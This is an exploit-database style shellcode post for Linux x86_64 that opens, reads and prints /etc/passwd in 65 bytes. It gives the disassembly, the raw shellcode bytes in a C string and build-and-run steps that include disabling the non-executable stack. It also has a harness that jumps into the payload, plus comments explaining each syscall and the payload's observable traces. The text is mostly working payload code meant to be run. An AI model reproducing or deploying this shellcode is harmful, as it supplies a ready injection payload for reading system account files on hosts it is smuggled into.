Linux/x86_64 - Read /etc/passwd - 65 bytes



EKU-ID: 5498 CVE: OSVDB-ID:
Author: Ajith Kp Published: 2016-04-18 Verified: Verified


/*
---------------------------------------------------------------------------------------------------
 
Linux/x86_64 - Read /etc/passwd - 65 bytes
 
Ajith Kp [ @ajithkp560 ] [ http://www.terminalcoders.blogspot.com ]
 
Om Asato Maa Sad-Gamaya |
Tamaso Maa Jyotir-Gamaya |
Mrtyor-Maa Amrtam Gamaya |
Om Shaantih Shaantih Shaantih |
 
---------------------------------------------------------------------------------------------------
Disassembly of section .text:
 
0000000000400080 <.text>:
  400080: eb 2f                 jmp    0x4000b1
  400082: 5f                    pop    rdi
  400083: 6a 02                 push   0x2
  400085: 58                    pop    rax
  400086: 48 31 f6              xor    rsi,rsi
  400089: 0f 05                 syscall
  40008b: 66 81 ec ef 0f        sub    sp,0xfef
  400090: 48 8d 34 24           lea    rsi,[rsp]
  400094: 48 97                 xchg   rdi,rax
  400096: 48 31 d2              xor    rdx,rdx
  400099: 66 ba ef 0f           mov    dx,0xfef
  40009d: 48 31 c0              xor    rax,rax
  4000a0: 0f 05                 syscall
  4000a2: 6a 01                 push   0x1
  4000a4: 5f                    pop    rdi
  4000a5: 48 92                 xchg   rdx,rax
  4000a7: 6a 01                 push   0x1
  4000a9: 58                    pop    rax
  4000aa: 0f 05                 syscall
  4000ac: 6a 3c                 push   0x3c
  4000ae: 58                    pop    rax
  4000af: 0f 05                 syscall
  4000b1: e8 cc ff ff ff        call   0x400082
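  4000b6: 2f                    (bad) 
  4000b7: 65 74 63              gs je  0x40011d
  4000ba: 2f                    (bad) 
  4000bb: 70 61                 jo     0x40011e
  4000bd: 73 73                 jae    0x400132
  4000bf: 77 64                 ja     0x400125
 
  Note: the bytes at 0x4000b6-0x4000c0 are not instructions. They are the 11
  ASCII bytes of the path "/etc/passwd", which the disassembler decoded as code.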
 
---------------------------------------------------------------------------------------------------
 
How To Run
 
$ gcc -o read_passwd read_passwd.c
$ execstack -s read_passwd
$ ./read_passwd
 
---------------------------------------------------------------------------------------------------
*/
#include <stdio.h>
/*
 * Raw x86_64 machine code for the payload, byte-for-byte the same as the
 * disassembly in the header comment (65 bytes; the string literal adds one
 * trailing NUL, which is what terminates the embedded path).
 *
 * What the bytes do, per that disassembly:
 *   - jmp/call/pop: the call at the end pushes the address of the data that
 *     follows it, and "pop rdi" picks it up, so the code finds its own path
 *     string without knowing where it was loaded.
 *   - syscall 2 (open) on that path with rsi = 0, i.e. read-only.
 *   - "sub sp,0xfef" makes room on the stack, then syscall 0 (read) pulls up
 *     to 0xfef bytes from the opened descriptor into that space.
 *   - syscall 1 (write) sends the number of bytes read to descriptor 1 (stdout).
 *   - syscall 0x3c (exit); rdi still holds 1 from the write, so the process
 *     exits with status 1.
 *
 * No syscall return value is checked: a failed open or read is passed
 * straight on to the next call.
 *
 * The last 11 bytes are the ASCII text "/etc/passwd". That plain-text path in
 * the byte stream, and the open/read/write/exit sequence at run time, are the
 * observable traces of this payload.
 */
char sh[]="\xeb\x2f\x5f\x6a\x02\x58\x48\x31\xf6\x0f\x05\x66\x81\xec\xef\x0f\x48\x8d\x34\x24\x48\x97\x48\x31\xd2\x66\xba\xef\x0f\x48\x31\xc0\x0f\x05\x6a\x01\x5f\x48\x92\x6a\x01\x58\x0f\x05\x6a\x3c\x58\x0f\x05\xe8\xcc\xff\xff\xff\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64";
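/*
 * Test harness: transfers control to the bytes stored in sh[] as if they were
 * a function taking no arguments.
 *
 * sh[] is an ordinary writable global, so the call only succeeds when that
 * memory is executable. The build steps in the header comment mark the binary
 * with "execstack -s" for this reason; with non-executable data enforced
 * (NX / W^X) the call faults instead of running the payload.
 * NOTE(review): newer x86-64 kernels are understood to apply an
 * executable-stack marking to the stack only, not to data mappings, in which
 * case this harness faults even after that step. Confirm per kernel.
 *
 * Returns 0 only if the call comes back, which is not expected here: the
 * payload finishes with an exit syscall.
 */
int main(int argc, char **argv)
{
    /* The harness takes no options; silence unused-parameter warnings. */
    (void)argc;
    (void)argv;

    /*
     * Converting an object pointer to a function pointer is not defined by
     * ISO C. It is accepted here as a compiler extension.
     */
    int (*func)(void) = (int (*)(void))sh;

    func();

    /* main must return int in a hosted program; the original used void. */
    return 0;
}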